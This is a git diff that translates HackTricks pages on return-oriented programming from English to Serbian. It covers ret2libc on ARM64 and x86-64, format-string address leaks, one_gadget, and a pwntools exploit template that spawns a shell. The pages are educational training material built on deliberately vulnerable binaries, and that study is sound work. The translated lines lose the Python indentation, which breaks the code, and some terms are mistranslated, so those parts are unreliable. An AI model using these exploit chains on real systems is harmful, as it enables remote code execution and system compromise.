+Github repozitorijum pominje da je **ARM64 podržan** od strane alata, ali kada se pokrene u libc-u Kali 2023.3 **ne pronalazi nijedan gadget**. ## Angry Gadget -From the [**github repo**](https://github.com/ChrisTheCoolHut/angry_gadget): Inspired by [OneGadget](https://github.com/david942j/one_gadget) this tool is written in python and uses [angr](https://github.com/angr/angr) to test constraints for gadgets executing `execve('/bin/sh', NULL, NULL)`\ -If you've run out gadgets to try from OneGadget, Angry Gadget gives a lot more with complicated constraints to try! - +Iz [**github repozitorijuma**](https://github.com/ChrisTheCoolHut/angry_gadget): Inspirisan [OneGadget](https://github.com/david942j/one_gadget), ovaj alat je napisan u python-u i koristi [angr](https://github.com/angr/angr) za testiranje ograničenja za gadgete koji izvršavaju `execve('/bin/sh', NULL, NULL)`\ +Ako ste iscrpeli gadgete koje možete isprobati iz OneGadget, Angry Gadget nudi mnogo više sa komplikovanim ograničenjima za isprobavanje! ```bash pip install angry_gadget angry_gadget.py examples/libc6_2.23-0ubuntu10_amd64.so ``` - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md index a9cfca917..e4cf39664 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md 
@@ -2,65 +2,58 @@ {{#include ../../../banners/hacktricks-training.md}} -## Ret2lib - NX bypass with ROP (no ASLR) - +## Ret2lib - NX zaobilaženje sa ROP (bez ASLR) ```c #include void bof() { - char buf[100]; - printf("\nbof>\n"); - fgets(buf, sizeof(buf)*3, stdin); +char buf[100]; +printf("\nbof>\n"); +fgets(buf, sizeof(buf)*3, stdin); } void main() { - printfleak(); - bof(); +printfleak(); +bof(); } ``` - -Compile without canary: - +Kompajlirati bez kanarinca: ```bash clang -o rop-no-aslr rop-no-aslr.c -fno-stack-protector # Disable aslr echo 0 | sudo tee /proc/sys/kernel/randomize_va_space ``` - -### Find offset +### Pronađi offset ### x30 offset -Creating a pattern with **`pattern create 200`**, using it, and checking for the offset with **`pattern search $x30`** we can see that the offset is **`108`** (0x6c). +Kreiranjem obrasca sa **`pattern create 200`**, koristeći ga, i proveravajući offset sa **`pattern search $x30`** možemo videti da je offset **`108`** (0x6c).
-Taking a look to the dissembled main function we can see that we would like to **jump** to the instruction to jump to **`printf`** directly, whose offset from where the binary is loaded is **`0x860`**: +Pogledom na disassembliranu glavnu funkciju možemo videti da želimo da **skočimo** na instrukciju koja direktno skače na **`printf`**, čiji je offset od mesta gde je binarni fajl učitan **`0x860`**:
-### Find system and `/bin/sh` string +### Pronađi sistem i `/bin/sh` string -As the ASLR is disabled, the addresses are going to be always the same: +Pošto je ASLR onemogućen, adrese će uvek biti iste:
-### Find Gadgets +### Pronađi Gadgets -We need to have in **`x0`** the address to the string **`/bin/sh`** and call **`system`**. - -Using rooper an interesting gadget was found: +Moramo imati u **`x0`** adresu do stringa **`/bin/sh`** i pozvati **`system`**. +Korišćenjem roopera pronađen je zanimljiv gadget: ``` 0x000000000006bdf0: ldr x0, [sp, #0x18]; ldp x29, x30, [sp], #0x20; ret; ``` - -This gadget will load `x0` from **`$sp + 0x18`** and then load the addresses x29 and x30 form sp and jump to x30. So with this gadget we can **control the first argument and then jump to system**. +Ovaj uređaj će učitati `x0` iz **`$sp + 0x18`** i zatim učitati adrese x29 i x30 iz sp i skočiti na x30. Tako da sa ovim uređajem možemo **kontrolisati prvi argument i zatim skočiti na system**. ### Exploit - ```python from pwn import * from time import sleep @@ -72,8 +65,8 @@ binsh = next(libc.search(b"/bin/sh")) #Verify with find /bin/sh system = libc.sym["system"] def expl_bof(payload): - p.recv() - p.sendline(payload) +p.recv() +p.sendline(payload) # Ret2main stack_offset = 108 
@@ -90,80 +83,72 @@ p.sendline(payload) p.interactive() p.close() ``` - -## Ret2lib - NX, ASL & PIE bypass with printf leaks from the stack - +## Ret2lib - NX, ASL i PIE zaobilaženje sa printf leak-ovima iz steka ```c #include void printfleak() { - char buf[100]; - printf("\nPrintf>\n"); - fgets(buf, sizeof(buf), stdin); - printf(buf); +char buf[100]; +printf("\nPrintf>\n"); +fgets(buf, sizeof(buf), stdin); +printf(buf); } void bof() { - char buf[100]; - printf("\nbof>\n"); - fgets(buf, sizeof(buf)*3, stdin); +char buf[100]; +printf("\nbof>\n"); +fgets(buf, sizeof(buf)*3, stdin); } void main() { - printfleak(); - bof(); +printfleak(); +bof(); } ``` - -Compile **without canary**: - +Kompajlirati **bez kanarinca**: ```bash clang -o rop rop.c -fno-stack-protector -Wno-format-security ``` +### PIE i ASLR ali bez kanarija -### PIE and ASLR but no canary - -- Round 1: - - Leak of PIE from stack - - Abuse bof to go back to main -- Round 2: - - Leak of libc from the stack - - ROP: ret2system +- Runda 1: +- Leak od PIE sa steka +- Zloupotreba bof da se vrati u main +- Runda 2: +- Leak od libc sa steka +- ROP: ret2system ### Printf leaks -Setting a breakpoint before calling printf it's possible to see that there are addresses to return to the binary in the stack and also libc addresses: +Postavljanjem breakpoint-a pre pozivanja printf, moguće je videti da postoje adrese za povratak u binarni kod na steku, kao i libc adrese:
-Trying different offsets, the **`%21$p`** can leak a binary address (PIE bypass) and **`%25$p`** can leak a libc address: +Pokušavajući različite ofsete, **`%21$p`** može da otkrije binarnu adresu (PIE bypass) i **`%25$p`** može da otkrije libc adresu:
-Subtracting the libc leaked address with the base address of libc, it's possible to see that the **offset** of the **leaked address from the base is `0x49c40`.** +Oduzimanjem otkrivene libc adrese od osnovne adrese libc, moguće je videti da je **ofset** otkrivene adrese od osnove `0x49c40`. -### x30 offset +### x30 ofset -See the previous example as the bof is the same. +Pogledajte prethodni primer jer je bof isti. -### Find Gadgets +### Pronađi Gadgets -Like in the previous example, we need to have in **`x0`** the address to the string **`/bin/sh`** and call **`system`**. - -Using rooper another interesting gadget was found: +Kao u prethodnom primeru, potrebno je imati u **`x0`** adresu do stringa **`/bin/sh`** i pozvati **`system`**. +Korišćenjem roopera pronađen je još jedan zanimljiv gadget: ``` 0x0000000000049c40: ldr x0, [sp, #0x78]; ldp x29, x30, [sp], #0xc0; ret; ``` - -This gadget will load `x0` from **`$sp + 0x78`** and then load the addresses x29 and x30 form sp and jump to x30. So with this gadget we can **control the first argument and then jump to system**. +Ovaj uređaj će učitati `x0` iz **`$sp + 0x78`** i zatim učitati adrese x29 i x30 iz sp i skočiti na x30. Tako da sa ovim uređajem možemo **kontrolisati prvi argument i zatim skočiti na system**. ### Exploit - ```python from pwn import * from time import sleep 
@@ -172,15 +157,15 @@ p = process('./rop') # For local binary libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6") def leak_printf(payload, is_main_addr=False): - p.sendlineafter(b">\n" ,payload) - response = p.recvline().strip()[2:] #Remove new line and "0x" prefix - if is_main_addr: - response = response[:-4] + b"0000" - return int(response, 16) +p.sendlineafter(b">\n" ,payload) +response = p.recvline().strip()[2:] #Remove new line and "0x" prefix +if is_main_addr: +response = response[:-4] + b"0000" +return int(response, 16) def expl_bof(payload): - p.recv() - p.sendline(payload) +p.recv() +p.sendline(payload) # Get main address main_address = leak_printf(b"%21$p", True) @@ -213,5 +198,4 @@ p.sendline(payload) p.interactive() ``` - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md index fb453a1ba..64ac2786f 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md 
@@ -1,84 +1,77 @@ -# Leaking libc address with ROP +# Curjenje libc adrese sa ROP {{#include ../../../../banners/hacktricks-training.md}} -## Quick Resume +## Brzi Rezime -1. **Find** overflow **offset** -2. **Find** `POP_RDI` gadget, `PUTS_PLT` and `MAIN` gadgets -3. Use previous gadgets lo **leak the memory address** of puts or another libc function and **find the libc version** ([donwload it](https://libc.blukat.me)) -4. With the library, **calculate the ROP and exploit it** +1. **Pronađi** offset **prelivanja** +2. **Pronađi** `POP_RDI` gadget, `PUTS_PLT` i `MAIN` gadgete +3. Iskoristi prethodne gadgete da **curiš adresu u memoriji** funkcije puts ili druge libc funkcije i **pronađi verziju libc** ([preuzmi je](https://libc.blukat.me)) +4. Sa bibliotekom, **izračunaj ROP i iskoristi ga** -## Other tutorials and binaries to practice +## Ostali tutorijali i binarni fajlovi za vežbanje -This tutorial is going to exploit the code/binary proposed in this tutorial: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)\ -Another useful tutorials: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html) +Ovaj tutorijal će iskoristiti kod/binarni fajl predložen u ovom tutorijalu: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)\ +Još korisnih tutorijala: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html) -## Code - -Filename: `vuln.c` +## Kod +Ime fajla: `vuln.c` ```c #include int main() { - char buffer[32]; - puts("Simple ROP.\n"); - gets(buffer); +char buffer[32]; +puts("Simple 
ROP.\n"); +gets(buffer); - return 0; +return 0; } ``` ```bash gcc -o vuln vuln.c -fno-stack-protector -no-pie ``` +## ROP - Leaking LIBC шаблон -## ROP - Leaking LIBC template - -Download the exploit and place it in the same directory as the vulnerable binary and give the needed data to the script: +Preuzmite exploit i stavite ga u istu direktoriju kao ranjivi binarni fajl i dajte potrebne podatke skripti: {{#ref}} rop-leaking-libc-template.md {{#endref}} -## 1- Finding the offset - -The template need an offset before continuing with the exploit. If any is provided it will execute the necessary code to find it (by default `OFFSET = ""`): +## 1- Pronalaženje ofseta +Šablonu je potreban ofset pre nego što nastavi sa exploitom. Ako je bilo koji ofset obezbeđen, izvršiće potrebni kod da ga pronađe (podrazumevano `OFFSET = ""`): ```bash ################### ### Find offset ### ################### OFFSET = ""#"A"*72 if OFFSET == "": - gdb.attach(p.pid, "c") #Attach and continue - payload = cyclic(1000) - print(r.clean()) - r.sendline(payload) - #x/wx $rsp -- Search for bytes that crashed the application - #cyclic_find(0x6161616b) # Find the offset of those bytes - return +gdb.attach(p.pid, "c") #Attach and continue +payload = cyclic(1000) +print(r.clean()) +r.sendline(payload) +#x/wx $rsp -- Search for bytes that crashed the application +#cyclic_find(0x6161616b) # Find the offset of those bytes +return ``` - -**Execute** `python template.py` a GDB console will be opened with the program being crashed. Inside that **GDB console** execute `x/wx $rsp` to get the **bytes** that were going to overwrite the RIP. Finally get the **offset** using a **python** console: - +**Izvršite** `python template.py` u GDB konzoli će se otvoriti program koji se ruši. Unutar te **GDB konzole** izvršite `x/wx $rsp` da dobijete **bajtove** koji će prepisati RIP. 
Na kraju, dobijte **offset** koristeći **python** konzolu: ```python from pwn import * cyclic_find(0x6161616b) ``` - ![](<../../../../images/image (1007).png>) -After finding the offset (in this case 40) change the OFFSET variable inside the template using that value.\ +Nakon pronalaženja ofseta (u ovom slučaju 40) promenite OFFSET promenljivu unutar šablona koristeći tu vrednost.\ `OFFSET = "A" * 40` -Another way would be to use: `pattern create 1000` -- _execute until ret_ -- `pattern seach $rsp` from GEF. +Drugi način bi bio da se koristi: `pattern create 1000` -- _izvršiti do ret_ -- `pattern seach $rsp` iz GEF-a. -## 2- Finding Gadgets - -Now we need to find ROP gadgets inside the binary. This ROP gadgets will be useful to call `puts`to find the **libc** being used, and later to **launch the final exploit**. +## 2- Pronalaženje Gadžeta +Sada treba da pronađemo ROP gadžete unutar binarnog fajla. Ovi ROP gadžeti će biti korisni za pozivanje `puts` kako bismo pronašli **libc** koja se koristi, a kasnije za **pokretanje konačnog eksploita**. ```python PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts MAIN_PLT = elf.symbols['main'] 
@@ -89,108 +82,98 @@ log.info("Main start: " + hex(MAIN_PLT)) log.info("Puts plt: " + hex(PUTS_PLT)) log.info("pop rdi; ret gadget: " + hex(POP_RDI)) ``` +`PUTS_PLT` je potreban za pozivanje **funkcije puts**.\ +`MAIN_PLT` je potreban za ponovo pozivanje **main funkcije** nakon jedne interakcije da bi se **iskoristila** prelivanja **ponovo** (beskonačne runde eksploatacije). **Koristi se na kraju svakog ROP-a da ponovo pozove program**.\ +**POP_RDI** je potreban da **prođe** **parametar** u pozvanu funkciju. -The `PUTS_PLT` is needed to call the **function puts**.\ -The `MAIN_PLT` is needed to call the **main function** again after one interaction to **exploit** the overflow **again** (infinite rounds of exploitation). **It is used at the end of each ROP to call the program again**.\ -The **POP_RDI** is needed to **pass** a **parameter** to the called function. +U ovom koraku ne morate izvršavati ništa jer će sve biti pronađeno od strane pwntools tokom izvršenja. -In this step you don't need to execute anything as everything will be found by pwntools during the execution. - -## 3- Finding libc library - -Now is time to find which version of the **libc** library is being used. To do so we are going to **leak** the **address** in memory of the **function** `puts`and then we are going to **search** in which **library version** the puts version is in that address. +## 3- Pronalaženje libc biblioteke +Sada je vreme da pronađemo koja verzija **libc** biblioteke se koristi. Da bismo to uradili, iskoristićemo **leak** **adresu** u memoriji **funkcije** `puts` i zatim ćemo **pretražiti** u kojoj **verziji biblioteke** se nalazi verzija puts na toj adresi. 
```python def get_addr(func_name): - FUNC_GOT = elf.got[func_name] - log.info(func_name + " GOT @ " + hex(FUNC_GOT)) - # Create rop chain - rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) +FUNC_GOT = elf.got[func_name] +log.info(func_name + " GOT @ " + hex(FUNC_GOT)) +# Create rop chain +rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) - #Send our rop-chain payload - #p.sendlineafter("dah?", rop1) #Interesting to send in a specific moment - print(p.clean()) # clean socket buffer (read all and print) - p.sendline(rop1) +#Send our rop-chain payload +#p.sendlineafter("dah?", rop1) #Interesting to send in a specific moment +print(p.clean()) # clean socket buffer (read all and print) +p.sendline(rop1) - #Parse leaked address - recieved = p.recvline().strip() - leak = u64(recieved.ljust(8, "\x00")) - log.info("Leaked libc address, "+func_name+": "+ hex(leak)) - #If not libc yet, stop here - if libc != "": - libc.address = leak - libc.symbols[func_name] #Save libc base - log.info("libc base @ %s" % hex(libc.address)) +#Parse leaked address +recieved = p.recvline().strip() +leak = u64(recieved.ljust(8, "\x00")) +log.info("Leaked libc address, "+func_name+": "+ hex(leak)) +#If not libc yet, stop here +if libc != "": +libc.address = leak - libc.symbols[func_name] #Save libc base +log.info("libc base @ %s" % hex(libc.address)) - return hex(leak) +return hex(leak) get_addr("puts") #Search for puts address in memmory to obtains libc base if libc == "": - print("Find the libc library and continue with the exploit... (https://libc.blukat.me/)") - p.interactive() +print("Find the libc library and continue with the exploit... 
(https://libc.blukat.me/)") +p.interactive() ``` - -To do so, the most important line of the executed code is: - +Da bi to uradili, najvažnija linija izvršenog koda je: ```python rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) ``` +Ovo će poslati neke bajtove dok **prepisivanje** **RIP** nije moguće: `OFFSET`.\ +Zatim, postaviće se **adresa** gadgeta `POP_RDI` tako da će sledeća adresa (`FUNC_GOT`) biti sačuvana u registru **RDI**. To je zato što želimo da **pozovemo puts** **proslavljajući** mu **adresu** `PUTS_GOT` jer je adresa u memoriji funkcije puts sačuvana u adresi na koju pokazuje `PUTS_GOT`.\ +Nakon toga, biće pozvan `PUTS_PLT` (sa `PUTS_GOT` unutar **RDI**) tako da će puts **pročitati sadržaj** unutar `PUTS_GOT` (**adresa funkcije puts u memoriji**) i **odštampati** ga.\ +Na kraju, **glavna funkcija se ponovo poziva** kako bismo mogli ponovo iskoristiti prelivanje. -This will send some bytes util **overwriting** the **RIP** is possible: `OFFSET`.\ -Then, it will set the **address** of the gadget `POP_RDI` so the next address (`FUNC_GOT`) will be saved in the **RDI** registry. This is because we want to **call puts** **passing** it the **address** of the `PUTS_GOT`as the address in memory of puts function is saved in the address pointing by `PUTS_GOT`.\ -After that, `PUTS_PLT` will be called (with `PUTS_GOT` inside the **RDI**) so puts will **read the content** inside `PUTS_GOT` (**the address of puts function in memory**) and will **print it out**.\ -Finally, **main function is called again** so we can exploit the overflow again. - -This way we have **tricked puts function** to **print** out the **address** in **memory** of the function **puts** (which is inside **libc** library). Now that we have that address we can **search which libc version is being used**. +Na ovaj način smo **prevarili funkciju puts** da **odštampa** **adresu** u **memoriji** funkcije **puts** (koja se nalazi u **libc** biblioteci). 
Sada kada imamo tu adresu možemo **pretražiti koja verzija libc se koristi**. ![](<../../../../images/image (1049).png>) -As we are **exploiting** some **local** binary it is **not needed** to figure out which version of **libc** is being used (just find the library in `/lib/x86_64-linux-gnu/libc.so.6`).\ -But, in a remote exploit case I will explain here how can you find it: +Pošto **iskorišćavamo** neki **lokalni** binarni fajl, **nije potrebno** da otkrijemo koja verzija **libc** se koristi (samo pronađite biblioteku u `/lib/x86_64-linux-gnu/libc.so.6`).\ +Ali, u slučaju udaljenog eksploata, objasniću ovde kako možete to da pronađete: -### 3.1- Searching for libc version (1) +### 3.1- Pretraživanje verzije libc (1) -You can search which library is being used in the web page: [https://libc.blukat.me/](https://libc.blukat.me)\ -It will also allow you to download the discovered version of **libc** +Možete pretražiti koja biblioteka se koristi na veb stranici: [https://libc.blukat.me/](https://libc.blukat.me)\ +Takođe će vam omogućiti da preuzmete otkrivenu verziju **libc** ![](<../../../../images/image (221).png>) -### 3.2- Searching for libc version (2) +### 3.2- Pretraživanje verzije libc (2) -You can also do: +Takođe možete uraditi: - `$ git clone https://github.com/niklasb/libc-database.git` - `$ cd libc-database` - `$ ./get` -This will take some time, be patient.\ -For this to work we need: +Ovo će potrajati, budite strpljivi.\ +Za ovo da bi radilo potrebni su nam: -- Libc symbol name: `puts` -- Leaked libc adddress: `0x7ff629878690` - -We can figure out which **libc** that is most likely used. +- Ime libc simbola: `puts` +- Otkazana libc adresa: `0x7ff629878690` +Možemo da utvrdimo koja **libc** se najverovatnije koristi. ```bash ./find puts 0x7ff629878690 ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64) archive-glibc (id libc6_2.23-0ubuntu11_amd64) ``` - -We get 2 matches (you should try the second one if the first one is not working). 
Download the first one: - +Dobijamo 2 podudaranja (trebalo bi da probate drugo ako prvo ne radi). Preuzmite prvo: ```bash ./download libc6_2.23-0ubuntu10_amd64 Getting libc6_2.23-0ubuntu10_amd64 - -> Location: http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.23-0ubuntu10_amd64.deb - -> Downloading package - -> Extracting package - -> Package saved to libs/libc6_2.23-0ubuntu10_amd64 +-> Location: http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.23-0ubuntu10_amd64.deb +-> Downloading package +-> Extracting package +-> Package saved to libs/libc6_2.23-0ubuntu10_amd64 ``` +Kopirajte libc iz `libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so` u naš radni direktorijum. -Copy the libc from `libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so` to our working directory. - -### 3.3- Other functions to leak - +### 3.3- Druge funkcije za leak ```python puts printf 
@@ -198,28 +181,24 @@ __libc_start_main read gets ``` +## 4- Pronalaženje libc adrese zasnovane na i iskorišćavanje -## 4- Finding based libc address & exploiting +U ovom trenutku treba da znamo koja se libc biblioteka koristi. Pošto iskorišćavamo lokalni binarni fajl, koristiću samo: `/lib/x86_64-linux-gnu/libc.so.6` -At this point we should know the libc library used. As we are exploiting a local binary I will use just:`/lib/x86_64-linux-gnu/libc.so.6` +Dakle, na početku `template.py` promenite **libc** promenljivu na: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Postavite putanju do biblioteke kada je znate` -So, at the beginning of `template.py` change the **libc** variable to: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it` - -Giving the **path** to the **libc library** the rest of the **exploit is going to be automatically calculated**. - -Inside the `get_addr`function the **base address of libc** is going to be calculated: +Davanjem **putanje** do **libc biblioteke**, ostatak **eksploata će biti automatski izračunat**. +Unutar `get_addr` funkcije, **osnovna adresa libc** će biti izračunata: ```python if libc != "": - libc.address = leak - libc.symbols[func_name] #Save libc base - log.info("libc base @ %s" % hex(libc.address)) +libc.address = leak - libc.symbols[func_name] #Save libc base +log.info("libc base @ %s" % hex(libc.address)) ``` - > [!NOTE] -> Note that **final libc base address must end in 00**. If that's not your case you might have leaked an incorrect library. - -Then, the address to the function `system` and the **address** to the string _"/bin/sh"_ are going to be **calculated** from the **base address** of **libc** and given the **libc library.** +> Imajte na umu da **konačna libc osnovna adresa mora završavati sa 00**. Ako to nije vaš slučaj, možda ste iscurili pogrešnu biblioteku. 
+Zatim, adresa funkcije `system` i **adresa** do stringa _"/bin/sh"_ će biti **izračunate** iz **osnovne adrese** **libc** i date **libc biblioteci.** ```python BINSH = next(libc.search("/bin/sh")) - 64 #Verify with find /bin/sh SYSTEM = libc.sym["system"] @@ -228,9 +207,7 @@ EXIT = libc.sym["exit"] log.info("bin/sh %s " % hex(BINSH)) log.info("system %s " % hex(SYSTEM)) ``` - -Finally, the /bin/sh execution exploit is going to be prepared sent: - +Konačno, eksploit za izvršavanje /bin/sh će biti pripremljen i poslat: ```python rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT) 
@@ -240,65 +217,56 @@ p.sendline(rop2) #### Interact with the shell ##### p.interactive() #Interact with the conenction ``` +Hajde da objasnimo ovaj konačni ROP.\ +Poslednji ROP (`rop1`) je ponovo pozvao glavnu funkciju, tako da možemo **ponovo iskoristiti** **overflow** (zato je `OFFSET` ovde ponovo). Zatim, želimo da pozovemo `POP_RDI` koji pokazuje na **adresu** _"/bin/sh"_ (`BINSH`) i pozovemo **system** funkciju (`SYSTEM`) jer će adresa _"/bin/sh"_ biti prosleđena kao parametar.\ +Na kraju, **adresa funkcije exit** je **pozvana** tako da proces **izlazi lepo** i ne generiše se nikakva upozorenja. -Let's explain this final ROP.\ -The last ROP (`rop1`) ended calling again the main function, then we can **exploit again** the **overflow** (that's why the `OFFSET` is here again). Then, we want to call `POP_RDI` pointing to the **addres** of _"/bin/sh"_ (`BINSH`) and call **system** function (`SYSTEM`) because the address of _"/bin/sh"_ will be passed as a parameter.\ -Finally, the **address of exit function** is **called** so the process **exists nicely** and any alert is generated. - -**This way the exploit will execute a \_/bin/sh**\_\*\* shell.\*\* +**Na ovaj način, exploit će izvršiti \_/bin/sh**\_\*\* shell.\*\* ![](<../../../../images/image (165).png>) -## 4(2)- Using ONE_GADGET +## 4(2)- Korišćenje ONE_GADGET -You could also use [**ONE_GADGET** ](https://github.com/david942j/one_gadget)to obtain a shell instead of using **system** and **"/bin/sh". ONE_GADGET** will find inside the libc library some way to obtain a shell using just one **ROP address**.\ -However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided. +Takođe možete koristiti [**ONE_GADGET** ](https://github.com/david942j/one_gadget) da dobijete shell umesto korišćenja **system** i **"/bin/sh". 
ONE_GADGET** će pronaći unutar libc biblioteke neki način da dobije shell koristeći samo jednu **ROP adresu**.\ +Međutim, obično postoje neka ograničenja, najčešća i lako izbegnuta su kao `[rsp+0x30] == NULL`. Pošto kontrolišete vrednosti unutar **RSP**, samo treba da pošaljete još nekoliko NULL vrednosti kako bi se ograničenje izbeglo. ![](<../../../../images/image (754).png>) - ```python ONE_GADGET = libc.address + 0x4526a rop2 = base + p64(ONE_GADGET) + "\x00"*100 ``` - ## EXPLOIT FILE -You can find a template to exploit this vulnerability here: +Možete pronaći šablon za iskorišćavanje ove ranjivosti ovde: {{#ref}} rop-leaking-libc-template.md {{#endref}} -## Common problems +## Uobičajeni problemi -### MAIN_PLT = elf.symbols\['main'] not found - -If the "main" symbol does not exist. Then you can find where is the main code: +### MAIN_PLT = elf.symbols\['main'] nije pronađen +Ako simbol "main" ne postoji. Tada možete pronaći gde je glavni kod: ```python objdump -d vuln_binary | grep "\.text" Disassembly of section .text: 0000000000401080 <.text>: ``` - -and set the address manually: - +i ručno postavite adresu: ```python MAIN_PLT = 0x401080 ``` +### Puts nije pronađen -### Puts not found +Ako binarni fajl ne koristi Puts, trebali biste proveriti da li koristi -If the binary is not using Puts you should check if it is using +### `sh: 1: %s%s%s%s%s%s%s%s: nije pronađen` -### `sh: 1: %s%s%s%s%s%s%s%s: not found` - -If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found` - -Try to **subtract 64 bytes to the address of "/bin/sh"**: +Ako pronađete ovu **grešku** nakon što ste kreirali **sve** eksploite: `sh: 1: %s%s%s%s%s%s%s%s: nije pronađen` +Pokušajte da **oduzmete 64 bajta od adrese "/bin/sh"**: ```python BINSH = next(libc.search("/bin/sh")) - 64 ``` - {{#include ../../../../banners/hacktricks-training.md}} 
diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md index def2864f4..c375e3cd1 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md @@ -1,11 +1,6 @@ -# Leaking libc - template +# Curjenje libc - šablon {{#include ../../../../banners/hacktricks-training.md}} - -
- -{% embed url="https://websec.nl/" %} - ```python:template.py from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64 # Import pwntools @@ -25,25 +20,25 @@ LIBC = "" #ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it ENV = {"LD_PRELOAD": LIBC} if LIBC else {} if LOCAL: - P = process(LOCAL_BIN, env=ENV) # start the vuln binary - ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary - ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets +P = process(LOCAL_BIN, env=ENV) # start the vuln binary +ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary +ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets elif REMOTETTCP: - P = remote('10.10.10.10',1339) # start the vuln binary - ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary - ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets +P = remote('10.10.10.10',1339) # start the vuln binary +ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary +ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets elif REMOTESSH: - ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) - p = ssh_shell.process(REMOTE_BIN) # start the vuln binary - elf = ELF(LOCAL_BIN)# Extract data from binary - rop = ROP(elf)# Find ROP gadgets +ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) +p = ssh_shell.process(REMOTE_BIN) # start the vuln binary +elf = ELF(LOCAL_BIN)# Extract data from binary +rop = ROP(elf)# Find ROP gadgets if GDB and not REMOTETTCP and not REMOTESSH: - # attach gdb and continue - # You can set breakpoints, for example "break *main" - gdb.attach(P.pid, "b *main") +# attach gdb and continue +# You can set breakpoints, for example "break *main" +gdb.attach(P.pid, "b *main") 
@@ -53,15 +48,15 @@ if GDB and not REMOTETTCP and not REMOTESSH: OFFSET = b"" #b"A"*264 if OFFSET == b"": - gdb.attach(P.pid, "c") #Attach and continue - payload = cyclic(264) - payload += b"AAAAAAAA" - print(P.clean()) - P.sendline(payload) - #x/wx $rsp -- Search for bytes that crashed the application - #print(cyclic_find(0x63616171)) # Find the offset of those bytes - P.interactive() - exit() +gdb.attach(P.pid, "c") #Attach and continue +payload = cyclic(264) +payload += b"AAAAAAAA" +print(P.clean()) +P.sendline(payload) +#x/wx $rsp -- Search for bytes that crashed the application +#print(cyclic_find(0x63616171)) # Find the offset of those bytes +P.interactive() +exit() @@ -69,11 +64,11 @@ if OFFSET == b"": ### Find Gadgets ### #################### try: - libc_func = "puts" - PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts +libc_func = "puts" +PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts except: - libc_func = "printf" - PUTS_PLT = ELF_LOADED.plt['printf'] +libc_func = "printf" +PUTS_PLT = ELF_LOADED.plt['printf'] MAIN_PLT = ELF_LOADED.symbols['main'] POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi" 
